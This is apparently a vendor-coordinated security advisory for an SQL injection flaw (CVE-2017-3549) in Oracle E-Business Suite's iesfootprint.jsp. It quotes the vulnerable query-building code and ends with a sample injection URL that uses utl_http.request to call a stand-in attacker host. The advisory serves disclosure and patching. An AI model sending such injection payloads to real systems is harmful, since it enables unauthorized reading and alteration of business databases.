Application: Oracle E-Business Suite **Versions Affected:**Oracle EBS 12.2.3 Vendor:Oracle **Bugs:**SQL injection **Reported:**23.12.2016 **Vendor response:**24.12.2016 **Date of Public Advisory:**18.04.2017 **Reference: **Oracle CPU April 2017 Authors: Dmitry Chastuhin (ERPScan)
Class: SQL injection
Impact: read sensitive data, modify or delete data from database
Remotely Exploitable: yes
Locally Exploitable: no
CVE: CVE-2017-3549
CVSS Base Score v3: 9.1 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | High (H) |
I: Impact to Integrity | High (H) |
A: Impact to Availability | None (N) |
The code comprises an SQL statement containing strings that can be altered by an attacker. The manipulated SQL statement can be used then to retrieve additional data from the database or to modify the data without authorization.
Oracle EBS 12.2.3
To correct this vulnerability, implement Oracle CPU April 2017
Vulnerable jsp name is iesfootprint.jsp
deployDate = ((request.getParameter(“deployDate”)) != null) ? request.getParameter(“deployDate”) : “”; responseDate = ((request.getParameter(“responseDate”)) != null) ? request.getParameter(“responseDate”) : “”; dscriptName = ((request.getParameter(“dscript_name”)) != null) ? request.getParameter(“dscript_name”) : “”; dscriptId = ((request.getParameter(“dscriptId”)) != null) ? request.getParameter(“dscriptId”) : “”; %> <% // Process the data based on params if (showGraph) { // Create Query String StringBuffer query = new StringBuffer(“SELECT panel_name, count_panels, avg_time, min_time, max_time, “); query.append(”'”).append(_prompts[10]).append(“'”); query.append(" Average_Time FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name, count(panel_name) count_panels, (sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE dscript_id = “); query.append(dscriptId); query.append(” AND start_time between “); query.append(”'“).append(deployDate).append(”'“); query.append(” and “); query.append(”'“).append(responseDate).append(”'“); query.append(” GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11"); // Get XMLDocument for the corresponding query and Paint graph try { XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString()); htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
deployDate = ((request.getParameter(“deployDate”)) != null) ? request.getParameter(“deployDate”) : “”;
responseDate = ((request.getParameter(“responseDate”)) != null) ? request.getParameter(“responseDate”) : “”;
dscriptName = ((request.getParameter(“dscript_name”)) != null) ? request.getParameter(“dscript_name”) : “”;
dscriptId = ((request.getParameter(“dscriptId”)) != null) ? request.getParameter(“dscriptId”) : “”;
%>
<%
// Process the data based on params
if (showGraph) {
// Create Query String
StringBuffer query = new StringBuffer("SELECT panel_name, count_panels, avg_time, min_time, max_time, ");
query.append(“'”).append(_prompts[10]).append(“'”);
query.append(" Average_Time FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name, count(panel_name) count_panels, (sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE dscript_id = ");
query.append(dscriptId);
query.append(" AND start_time between ");
query.append(“'”).append(deployDate).append(“'”);
query.append(" and ");
query.append(“'”).append(responseDate).append(“'”);
query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11");
// Get XMLDocument for the corresponding query and Paint graph
try {
XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());
htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);
—|—
Approximate request with SQL injection
http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11’ AND utl_http.request(‘http://attackers_host/lalal’)=‘1’ GROUP BY panel_name)) –
1
|
http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11’ AND utl_http.request(‘http://attackers_host/lalal’)=‘1’ GROUP BY panel_name)) –
—|—